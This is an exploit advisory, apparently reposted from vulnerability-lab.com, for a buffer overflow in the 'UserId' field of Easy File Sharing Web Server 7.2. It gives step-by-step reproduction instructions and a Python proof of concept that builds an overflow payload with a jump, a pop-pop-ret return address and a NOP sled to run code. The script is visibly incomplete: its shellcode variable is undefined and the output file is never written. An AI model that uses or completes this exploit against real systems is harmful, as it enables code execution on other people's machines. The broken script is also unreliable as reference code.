Easy File Sharing Web Server 7.2 – ‘UserId’ Buffer Overflow exploit

A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.

Date of Discovery:


Exploitation Technique:

Local & Remote

Platfom Tested:

Windows 7

Levels Risk :

Proof of Concept (PoC):

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software « Click User Account -> Add »
4.Paste the contents of the file (poc.txt) into the input « UserId » and click « OK »
5.Now the calculator executes!


from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")

[+] www.vulnerability-lab.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.